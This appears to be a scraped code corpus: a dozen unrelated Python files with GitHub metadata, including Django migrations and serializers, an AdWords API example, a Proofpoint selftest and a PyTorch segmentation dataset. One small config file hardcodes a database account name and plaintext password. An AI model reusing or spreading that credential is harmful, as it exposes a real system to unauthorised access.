4c09c6787a39b18a12dfcbb2c33fcceabd4fc621
|
refs/heads/master
| 2020-03-26T23:26:03.391360
| 2019-04-23T12:49:53
| 2019-04-23T12:49:53
| 145,541,824
| 1
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 135
|
py
|
# read two ints, multiply them, and print the (1-based) position of the
# lowest set bit in the binary representation of the product
n, m = map(int, input().split())
k = bin(n * m)  # e.g. bin(12) -> '0b1100'
c = 0
# scan the binary string right to left, stopping before the '0b' prefix
for x in range(len(k) - 1, 1, -1):
    c = c + 1
    if k[x] == '1':
        print(c)
        break
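# Equivalent bit-trick sketch (illustrative): `v & -v` isolates the lowest
# set bit, and bit_length() gives its 1-based position directly:
#     v = 12                   # 0b1100
#     (v & -v).bit_length()    # -> 3, the same value the loop above prints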
|
[
"noreply@github.com"
] |
Sravaniram.noreply@github.com
|
d4b58b2e033e8c716f005be46976aa0c5a9599e7
|
347c70d4851b568e03e83387f77ae81071ab739e
|
/fn_proofpoint_tap/fn_proofpoint_tap/util/selftest.py
|
f923ce1c4bd5ea486dbcb877544c0adc313565cb
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
neetinkandhare/resilient-community-apps
|
59d276b5fb7a92872143ce2b94edd680738693ce
|
3ecdabe6bf2fc08f0f8e58cbe92553270d8da42f
|
refs/heads/master
| 2021-12-27T09:05:36.563404
| 2021-09-29T13:04:56
| 2021-09-29T13:04:56
| 159,804,866
| 1
| 0
|
MIT
| 2021-08-03T19:45:45
| 2018-11-30T10:07:32
|
Python
|
UTF-8
|
Python
| false
| false
| 1,750
|
py
|
# -*- coding: utf-8 -*-
# pragma pylint: disable=unused-argument, no-self-use
# (c) Copyright IBM Corp. 2019. All Rights Reserved.
"""Function implementation
    test with: resilient-circuits selftest -l fn_proofpoint_tap
"""
import logging
import os
from requests.auth import HTTPBasicAuth
from resilient_lib import RequestsCommon, validate_fields
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
log.addHandler(logging.StreamHandler())
def selftest_function(opts):
"""
Placeholder for selftest function. An example use would be to test package api connectivity.
    Suggested return values are unimplemented, success, or failure.
"""
options = opts.get('fn_proofpoint_tap', {})
validate_fields(['base_url', 'username', 'password'], options)
base_url = options.get('base_url')
username = options.get('username')
password = options.get('password')
cafile = options.get('cafile')
bundle = os.path.expanduser(cafile) if cafile else False
basic_auth = HTTPBasicAuth(username, password)
url = '{}/siem/all?format=JSON&sinceSeconds={}'.format(base_url, 300) # /v2/siem/all Fetch events for all clicks and messages relating to known threats within the specified time period
rc = RequestsCommon(opts=opts, function_opts=options)
try:
res = rc.execute_call_v2('get', url, auth=basic_auth, verify=bundle, proxies=rc.get_proxies())
if res.status_code == 200:
return {'state': 'success'}
return {
'state': 'failure',
'reason': 'status code {0}'.format(res.status_code)
}
except Exception as ex:
log.error(ex)
return {
'state': 'failure',
            'reason': str(ex)
}
|
[
"ihor.husar@ibm.com"
] |
ihor.husar@ibm.com
|
85e1dfdd04e38ad955261cc8e671a25fb7798885
|
26dec2f8f87a187119336b09d90182d532e9add8
|
/mcod/histories/apps.py
|
a7f0a00b9687b8ac862b1830d5b72c8fe03043fe
|
[] |
no_license
|
olekstomek/mcod-backend-dane.gov.pl
|
7008bcd2dbd0dbada7fe535536b02cf27f3fe4fd
|
090dbf82c57633de9d53530f0c93dddf6b43a23b
|
refs/heads/source-with-hitory-from-gitlab
| 2022-09-14T08:09:45.213971
| 2019-05-31T06:22:11
| 2019-05-31T06:22:11
| 242,246,709
| 0
| 1
| null | 2020-02-24T22:39:26
| 2020-02-21T23:11:50
|
Python
|
UTF-8
|
Python
| false
| false
| 187
|
py
|
from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
class HistoriesConfig(AppConfig):
name = 'mcod.histories'
verbose_name = _('Histories')
|
[
"piotr.zientarski@britenet.com.pl"
] |
piotr.zientarski@britenet.com.pl
|
0bba8246a143872757d6de146020f6d5366ab9fb
|
6dcf2d8ce367d6afd64024e5f41d4a11c27ca3d5
|
/gmecol/migrations/0002_auto__add_field_game_image_url__add_field_game_remote_id__add_field_pl.py
|
293eada3da4be3326dd035ea611a874e7f9c658c
|
[
"BSD-2-Clause"
] |
permissive
|
iyox/gmecol
|
75cc02870958fb0c747f93f62c42868eaf11601b
|
c03ff0fdfca7cb73fe8646e1ed4543db7d2e6c89
|
refs/heads/master
| 2021-01-15T16:58:27.692794
| 2012-09-06T03:50:39
| 2012-09-06T03:50:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,919
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Game.image_url'
db.add_column('gmecol_game', 'image_url',
self.gf('django.db.models.fields.TextField')(default=1),
keep_default=False)
# Adding field 'Game.remote_id'
db.add_column('gmecol_game', 'remote_id',
self.gf('django.db.models.fields.IntegerField')(default=1),
keep_default=False)
# Adding field 'Platform.image_url'
db.add_column('gmecol_platform', 'image_url',
self.gf('django.db.models.fields.TextField')(default=1),
keep_default=False)
# Adding field 'Platform.remote_id'
db.add_column('gmecol_platform', 'remote_id',
self.gf('django.db.models.fields.IntegerField')(default=1),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Game.image_url'
db.delete_column('gmecol_game', 'image_url')
# Deleting field 'Game.remote_id'
db.delete_column('gmecol_game', 'remote_id')
# Deleting field 'Platform.image_url'
db.delete_column('gmecol_platform', 'image_url')
# Deleting field 'Platform.remote_id'
db.delete_column('gmecol_platform', 'remote_id')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'gmecol.game': {
'Meta': {'object_name': 'Game'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_url': ('django.db.models.fields.TextField', [], {}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'platform': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['gmecol.Platform']"}),
'remote_id': ('django.db.models.fields.IntegerField', [], {}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
},
'gmecol.platform': {
'Meta': {'object_name': 'Platform'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_url': ('django.db.models.fields.TextField', [], {}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'remote_id': ('django.db.models.fields.IntegerField', [], {}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
},
'gmecol.usergame': {
'Meta': {'object_name': 'UserGame'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'for_sale': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'for_trade': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'game': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['gmecol.Game']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'rating': ('django.db.models.fields.IntegerField', [], {'default': '3'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['gmecol.UserProfile']"})
},
'gmecol.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'games': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['gmecol.Game']", 'through': "orm['gmecol.UserGame']", 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'platforms': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['gmecol.Platform']", 'symmetrical': 'False'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
}
}
complete_apps = ['gmecol']
|
[
"f4nt@f4ntasmic.com"
] |
f4nt@f4ntasmic.com
|
9c37792e8f94df710b6d3440b26852c0adaa94e4
|
79baf4404e51bdc0f33038b3b16bea86ff09e82f
|
/azext_iot/tests/digitaltwins/test_dt_generic_unit.py
|
0893dc929dab4b65fd9bf2a07dadc07136a01af7
|
[
"MIT"
] |
permissive
|
Azure/azure-iot-cli-extension
|
80b6cb29e907f7512c7361a85d6bfdea5ae2dd9e
|
bdbe65c3874ff632c2eba25c762e9ea8e9175b5f
|
refs/heads/dev
| 2023-09-04T10:57:16.118442
| 2023-08-28T17:12:05
| 2023-08-28T17:12:05
| 103,456,760
| 95
| 80
|
NOASSERTION
| 2023-09-13T00:02:54
| 2017-09-13T22:04:36
|
Python
|
UTF-8
|
Python
| false
| false
| 1,280
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import pytest
from azext_iot.digitaltwins.providers import generic as subject
class TestLROCheckStateHelper(object):
@pytest.mark.parametrize(
"test_input", [
{},
{"foo": "bar"},
{"provisioning_state": "bar"},
{"properties": {"foo": "bar"}},
{"properties": {"provisioning_state": "foo"}},
{"provisioning_state": "bar", "properties": {"provisioning_state": "foo"}}
]
)
def test_get_provisioning_state(self, test_input):
output = subject._get_provisioning_state(test_input)
if test_input.get("provisioning_state"):
assert output == test_input["provisioning_state"]
elif test_input.get("properties") and test_input.get("properties").get("provisioning_state"):
assert output == test_input["properties"]["provisioning_state"]
else:
assert output is None
|
[
"noreply@github.com"
] |
Azure.noreply@github.com
|
2e5c9db597970c087922fe5fb4e821040099e528
|
d92ce9a32bf20086e30701585a4e73c1f2469aff
|
/FunDooapp/virtualenv/bin/pyreverse
|
4bb367f33b44c24c82bc7034882867f23526d633
|
[] |
no_license
|
Prem-chouhan/fellowshipProgram_PremsinghChouhan
|
f61cf4407458f14ef7eb6d80effb25f9592d2552
|
33e6b57f6c75a80d8a3d1f868d379e85365a1336
|
refs/heads/master
| 2020-09-14T12:45:16.269268
| 2019-12-23T14:24:10
| 2019-12-23T14:24:10
| 223,128,906
| 0
| 1
| null | 2020-07-22T11:50:46
| 2019-11-21T08:47:28
|
Python
|
UTF-8
|
Python
| false
| false
| 271
|
#!/home/admin-1/PycharmProjects/FunDooapp/virtualenv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pylint import run_pyreverse
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(run_pyreverse())
|
[
"antonyalexcm@gmail.com"
] |
antonyalexcm@gmail.com
|
|
b4f53d695d80feab5e9b69fa72d78e8512187c80
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_affiliations.py
|
42384cf4a16916f7866a17a2fbb1a0dcf5f45e29
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 242
|
py
|
# class header
class _AFFILIATIONS():
    def __init__(self):
        self.name = "AFFILIATIONS"
        self.definitions = ['affiliation']  # base word this form derives from

        self.parents = []
        self.children = []
        self.properties = []
        self.jsondata = {}

        self.basic = ['affiliation']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
fed4bdd2449e04bd15775b80ce99c2bf71bc3df3
|
bbe447a740929eaee1955bd9c1517cf760dd5cb9
|
/aralib/adwordsApi/examples/v201003/add_negative_campaign_criterion.py
|
54e653048ddbd0762277bfa7d7600e8aed50b548
|
[
"Apache-2.0"
] |
permissive
|
MujaahidSalie/aranciulla
|
f3d32e7dd68ecfca620fe4d3bf22ecb4762f5893
|
34197dfbdb01479f288611a0cb700e925c4e56ce
|
refs/heads/master
| 2020-09-07T02:16:25.261598
| 2011-11-01T21:20:46
| 2011-11-01T21:20:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,065
|
py
|
#!/usr/bin/python
#
# Copyright 2010 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""This example creates new negative campaign criterion. To create campaign, run
add_campaign.py.
Tags: CampaignCriterionService.mutate
"""
__author__ = 'api.sgrinberg@gmail.com (Stan Grinberg)'
import sys
sys.path.append('../..')
# Import appropriate classes from the client library.
from aw_api.Client import Client
# Initialize client object.
client = Client(path='../..')
# Initialize appropriate service.
campaign_criterion_service = client.GetCampaignCriterionService(
'https://adwords-sandbox.google.com', 'v201003')
# Construct campaign criterion object and add negative campaign criterion.
campaign_id = 'INSERT_CAMPAIGN_ID_HERE'
operations = [{
'operator': 'ADD',
'operand': {
'type': 'NegativeCampaignCriterion',
'campaignId': campaign_id,
'criterion': {
'type': 'Keyword',
'matchType': 'BROAD',
'text': 'jupiter cruise'
}
}
}]
campaign_criterion = campaign_criterion_service.Mutate(
operations)[0]['value'][0]
# Display results.
print ('New negative campaign criterion with \'%s\' id and \'%s\' text was '
'successfully added to \'%s\' campaign.'
% (campaign_criterion['criterion']['id'],
campaign_criterion['criterion']['text'],
campaign_criterion['campaignId']))
print
print ('Usage: %s units, %s operations' % (client.GetUnits(),
client.GetOperations()))
|
[
"vincenzo.ampolo@gmail.com"
] |
vincenzo.ampolo@gmail.com
|
d90727f571830e06611f1580efa36793cde8b63e
|
b08bddd99d49ff242aa890b491cbbdf09ce128f0
|
/apps/login_app/migrations/0004_auto_20170823_1152.py
|
3226750b3561b5ea2af2985e960273767eed143f
|
[] |
no_license
|
HollinRoberts/friends
|
24b99c031a7771ad1b35a22112658f01fe3d8090
|
ae22c690f6800c74b6f794f44eefd97b607d008a
|
refs/heads/master
| 2021-01-20T05:28:42.381205
| 2017-08-25T22:41:21
| 2017-08-25T22:41:21
| 101,447,198
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 640
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-23 18:52
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('login_app', '0003_auto_20170823_1148'),
]
operations = [
migrations.AddField(
model_name='poke',
name='created_at',
field=models.DateTimeField(auto_now_add=True, null=True),
),
migrations.AddField(
model_name='poke',
name='updated_at',
field=models.DateTimeField(auto_now=True, null=True),
),
]
|
[
"hollinroberts@gmail.com"
] |
hollinroberts@gmail.com
|
c4f9a57a58113e650a9ac005d75441afa0d6d22e
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/stacksNqueues_20200722084452.py
|
d0552e00c0ca213a09d1eebd1be5b92128dad478
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129
| 2020-09-11T12:05:22
| 2020-09-11T12:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 470
|
py
|
# we'll use a list to represent a stack and a deque for a queue
# empty list
# a stack is last in, first out (LIFO)
stack = []
stack.append(1)
stack.append(2)
stack.append(3)
stack.append(4)
# remove item from stack(pop)
x = stack.pop()
from collections import deque
# create empty deque
queue = deque()
queue.append(1)
queue.append(2)
queue.append(3)
queue.append(4)
print(queue)
# remove elements from the front of the list
# a queue is first in, first out (FIFO)
y = queue.popleft()
print(y)
print(queue)
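# Why a deque for the queue: list.pop(0) shifts every remaining element and
# is O(n), while deque.popleft() is O(1). A deque also works as a stack:
stack2 = deque()
stack2.append('a')
stack2.append('b')
print(stack2.pop())  # 'b' - last in, first out, like the list-based stack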
|
[
"mary.jereh@gmail.com"
] |
mary.jereh@gmail.com
|
ca9694bf200c7f1b74e093a94f8a7fb7b3f38eb3
|
94f156b362fbce8f89c8e15cd7687f8af267ef08
|
/endterm/main/permissions.py
|
fa03d8dfbbb352fd4d500b5d47d7396758ac8649
|
[] |
no_license
|
DastanB/AdvancedDjango
|
6eee5477cd5a00423972c9cc3d2b5f1e4a501841
|
2b5d4c22b278c6d0e08ab7e84161163fe42e9a3f
|
refs/heads/master
| 2020-07-17T19:21:16.271964
| 2019-12-03T21:58:51
| 2019-12-03T21:58:51
| 206,081,522
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 419
|
py
|
from rest_framework.permissions import IsAuthenticated, BasePermission
from django.contrib.auth.models import User
class ArticlePermission(BasePermission):
message = 'You must be the owner of the project.'
def has_permission(self, request, view):
return True
    def has_object_permission(self, request, view, obj):
        # 'is not' tests identity, not string equality; use != here
        if view.action != 'list':
            return request.user == obj.creator
        return True  # list views are not restricted to the owner
|
[
"dastan211298@gmail.com"
] |
dastan211298@gmail.com
|
27612de0eb84d3c9a15217b1cf2ccef7a2e61e91
|
95df12156e4dd24ed3646a93da972ab1a8e654f5
|
/propmix/hpiraw/hpiraw_api_server/hpiraw/dbauth.py
|
046ff02ca76ec3638b865c08fa7bf60437ba96d4
|
[] |
no_license
|
sijuaugustin/ingts
|
1cf05e9acaac85181f82b8442537755a7799e300
|
68df567caa7c581e89eea7130fa8a45cd83a40ae
|
refs/heads/master
| 2020-06-01T15:49:23.620893
| 2017-06-13T06:56:27
| 2017-06-13T06:56:27
| 94,078,907
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 191
|
py
|
'''
Created on Jan 6, 2017
@author: joseph
'''
DATABASE_ACCESS = {'name': 'hpi_api',
'password': 'hpi@!23',
'source': 'cognubauth'
}
|
[
"siju.augustine@cognub.com"
] |
siju.augustine@cognub.com
|
4216ba8538130d5be7bb47ed1e6f3ccb8612f153
|
db4f69e1643b61c411fee9190a3ae8f77ee2db04
|
/polyaxon/api/experiment_groups/serializers.py
|
3bafa236ca3b166d8ecdadbbad365de6ba88f485
|
[
"MIT"
] |
permissive
|
gzcf/polyaxon
|
f159c4138fee5b1f47fb57aa6bda440fe29812fb
|
77ac8838c6444a36541e6c28aba7ae42de392fee
|
refs/heads/master
| 2021-04-18T21:22:54.269899
| 2018-08-24T09:22:22
| 2018-08-24T09:22:22
| 126,830,407
| 0
| 0
|
MIT
| 2018-04-20T18:07:17
| 2018-03-26T13:08:02
|
Python
|
UTF-8
|
Python
| false
| false
| 4,125
|
py
|
from rest_framework import fields, serializers
from rest_framework.exceptions import ValidationError
from api.utils.serializers.bookmarks import BookmarkedSerializerMixin
from db.models.experiment_groups import ExperimentGroup, ExperimentGroupStatus
from libs.spec_validation import validate_group_spec_content
class ExperimentGroupStatusSerializer(serializers.ModelSerializer):
uuid = fields.UUIDField(format='hex', read_only=True)
class Meta:
model = ExperimentGroupStatus
extra_kwargs = {'experiment_group': {'read_only': True}}
exclude = []
class ExperimentGroupSerializer(serializers.ModelSerializer):
uuid = fields.UUIDField(format='hex', read_only=True)
project = fields.SerializerMethodField()
user = fields.SerializerMethodField()
class Meta:
model = ExperimentGroup
fields = (
'id',
'uuid',
'name',
'unique_name',
'user',
'description',
'last_status',
'project',
'created_at',
'updated_at',
'started_at',
'finished_at',
'tags',
'concurrency',
'search_algorithm'
)
def get_project(self, obj):
return obj.project.unique_name
def get_user(self, obj):
return obj.user.username
class ExperimentGroupDetailSerializer(ExperimentGroupSerializer, BookmarkedSerializerMixin):
bookmarked_model = 'experimentgroup'
num_experiments = fields.SerializerMethodField()
num_pending_experiments = fields.SerializerMethodField()
num_running_experiments = fields.SerializerMethodField()
num_scheduled_experiments = fields.SerializerMethodField()
num_succeeded_experiments = fields.SerializerMethodField()
num_failed_experiments = fields.SerializerMethodField()
num_stopped_experiments = fields.SerializerMethodField()
current_iteration = fields.SerializerMethodField()
class Meta(ExperimentGroupSerializer.Meta):
fields = ExperimentGroupSerializer.Meta.fields + (
'current_iteration',
'content',
'hptuning',
'has_tensorboard',
'num_experiments',
'num_pending_experiments',
'num_running_experiments',
'num_scheduled_experiments',
'num_succeeded_experiments',
'num_failed_experiments',
'num_stopped_experiments',
'bookmarked',
)
def get_num_experiments(self, obj):
return obj.experiments__count
def get_num_pending_experiments(self, obj):
return obj.pending_experiments__count
def get_num_running_experiments(self, obj):
return obj.running_experiments__count
def get_num_scheduled_experiments(self, obj):
return obj.scheduled_experiments__count
def get_num_succeeded_experiments(self, obj):
return obj.succeeded_experiments__count
def get_num_failed_experiments(self, obj):
return obj.failed_experiments__count
def get_num_stopped_experiments(self, obj):
return obj.stopped_experiments__count
def get_current_iteration(self, obj):
return obj.iterations__count
def validate_content(self, content):
validate_group_spec_content(content)
return content
def validate(self, attrs):
if self.initial_data.get('check_specification') and not attrs.get('content'):
raise ValidationError('Experiment group expects `content`.')
return attrs
class ExperimentGroupCreateSerializer(ExperimentGroupSerializer):
class Meta(ExperimentGroupSerializer.Meta):
fields = ExperimentGroupSerializer.Meta.fields + (
'search_algorithm',
'content',
)
def validate_content(self, content):
validate_group_spec_content(content)
return content
def validate(self, attrs):
if self.initial_data.get('check_specification') and not attrs.get('content'):
raise ValidationError('Experiment group expects `content`.')
return attrs
|
[
"mouradmourafiq@gmail.com"
] |
mouradmourafiq@gmail.com
|
893dfeefb69b21a01de2a54510f145d36809b70b
|
58bc54ce2f5d4beaac2366bf5b0bb76e51ebfda3
|
/pytorch_toolbelt/datasets/segmentation.py
|
cadd5b4769c66e66c8cb6b0a8d058123710d1111
|
[
"MIT"
] |
permissive
|
anashas/pytorch-toolbelt
|
1fbe76648719b2e1832e9fcbd0b2c30f134882cc
|
a04e28b10a43747ab75f88503ee771f89edf59fb
|
refs/heads/master
| 2023-03-15T00:31:48.045880
| 2021-03-02T20:36:27
| 2021-03-02T20:36:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,487
|
py
|
from functools import partial
from typing import Optional, List, Callable
import albumentations as A
import cv2
import numpy as np
from skimage.measure import block_reduce
from torch.utils.data import Dataset
from .common import (
read_image_rgb,
INPUT_IMAGE_KEY,
INPUT_IMAGE_ID_KEY,
INPUT_INDEX_KEY,
TARGET_MASK_WEIGHT_KEY,
TARGET_MASK_KEY,
name_for_stride,
UNLABELED_SAMPLE,
)
from ..utils import fs, image_to_tensor
__all__ = ["mask_to_bce_target", "mask_to_ce_target", "SegmentationDataset", "compute_weight_mask"]
def mask_to_bce_target(mask):
return image_to_tensor(mask, dummy_channels_dim=True).float()
def mask_to_ce_target(mask):
return image_to_tensor(mask, dummy_channels_dim=False).long()
def compute_weight_mask(mask: np.ndarray, edge_weight=4) -> np.ndarray:
    # scipy's binary_dilation/binary_erosion accept the `structure=` keyword
    # used below (the skimage versions do not)
    from scipy.ndimage import binary_dilation, binary_erosion

    binary_mask = mask > 0
    weight_mask = np.ones(mask.shape[:2]).astype(np.float32)

    if binary_mask.any():
        dilated = binary_dilation(binary_mask, structure=np.ones((5, 5), dtype=bool))
        eroded = binary_erosion(binary_mask, structure=np.ones((5, 5), dtype=bool))

        # pixels added by dilation or removed by erosion form the object boundary
        a = dilated & ~binary_mask
        b = binary_mask & ~eroded

        weight_mask = (a | b).astype(np.float32) * edge_weight + 1
        weight_mask = cv2.GaussianBlur(weight_mask, ksize=(5, 5), sigmaX=5)
    return weight_mask
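# Illustrative sketch (an assumption, not part of the library): on a toy
# 8x8 mask, compute_weight_mask yields weights near edge_weight + 1 along
# the object boundary and ~1 elsewhere:
#
#     toy = np.zeros((8, 8), dtype=np.uint8)
#     toy[2:6, 2:6] = 1
#     w = compute_weight_mask(toy, edge_weight=4)
#     assert w.shape == (8, 8) and w.max() > 1.0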
def _block_reduce_dominant_label(x: np.ndarray, axis):
try:
# minlength is +1 to num classes because we must account for IGNORE_LABEL
minlength = np.max(x) + 1
bincount_fn = partial(np.bincount, minlength=minlength)
counts = np.apply_along_axis(bincount_fn, -1, x.reshape((x.shape[0], x.shape[1], -1)))
reduced = np.argmax(counts, axis=-1)
return reduced
except Exception as e:
print(e)
print("shape", x.shape, "axis", axis)
def read_binary_mask(mask_fname: str) -> np.ndarray:
    mask = cv2.imread(mask_fname, cv2.IMREAD_COLOR)
    # cv2.threshold returns a (retval, image) tuple; return only the image
    return cv2.threshold(mask, 0, 255, cv2.THRESH_BINARY, dst=mask)[1]
class SegmentationDataset(Dataset):
"""
Dataset class suitable for segmentation tasks
"""
def __init__(
self,
image_filenames: List[str],
mask_filenames: Optional[List[str]],
transform: A.Compose,
read_image_fn: Callable = read_image_rgb,
read_mask_fn: Callable = cv2.imread,
need_weight_mask=False,
need_supervision_masks=False,
make_mask_target_fn: Callable = mask_to_ce_target,
):
if mask_filenames is not None and len(image_filenames) != len(mask_filenames):
raise ValueError("Number of images does not corresponds to number of targets")
self.image_ids = [fs.id_from_fname(fname) for fname in image_filenames]
self.need_weight_mask = need_weight_mask
self.need_supervision_masks = need_supervision_masks
self.images = image_filenames
self.masks = mask_filenames
self.read_image = read_image_fn
self.read_mask = read_mask_fn
self.transform = transform
self.make_target = make_mask_target_fn
def __len__(self):
return len(self.images)
def set_target(self, index: int, value: np.ndarray):
mask_fname = self.masks[index]
value = (value * 255).astype(np.uint8)
cv2.imwrite(mask_fname, value)
def __getitem__(self, index):
image = self.read_image(self.images[index])
if self.masks is not None:
mask = self.read_mask(self.masks[index])
else:
mask = np.ones((image.shape[0], image.shape[1], 1), dtype=np.uint8) * UNLABELED_SAMPLE
data = self.transform(image=image, mask=mask)
image = data["image"]
mask = data["mask"]
sample = {
INPUT_INDEX_KEY: index,
INPUT_IMAGE_ID_KEY: self.image_ids[index],
INPUT_IMAGE_KEY: image_to_tensor(image),
TARGET_MASK_KEY: self.make_target(mask),
}
if self.need_weight_mask:
sample[TARGET_MASK_WEIGHT_KEY] = image_to_tensor(compute_weight_mask(mask)).float()
if self.need_supervision_masks:
for i in range(1, 5):
stride = 2 ** i
mask = block_reduce(mask, (2, 2), partial(_block_reduce_dominant_label))
sample[name_for_stride(TARGET_MASK_KEY, stride)] = self.make_target(mask)
return sample
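# ---------------------------------------------------------------------------
# Minimal construction sketch (illustrative; the file paths are placeholder
# assumptions):
#
#     transform = A.Compose([A.Resize(256, 256), A.Normalize()])
#     dataset = SegmentationDataset(
#         image_filenames=["img/0001.png"],
#         mask_filenames=["mask/0001.png"],
#         transform=transform,
#         make_mask_target_fn=mask_to_bce_target,  # binary segmentation
#     )
#     sample = dataset[0]  # dict with INPUT_IMAGE_KEY / TARGET_MASK_KEY entries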
|
[
"ekhvedchenya@gmail.com"
] |
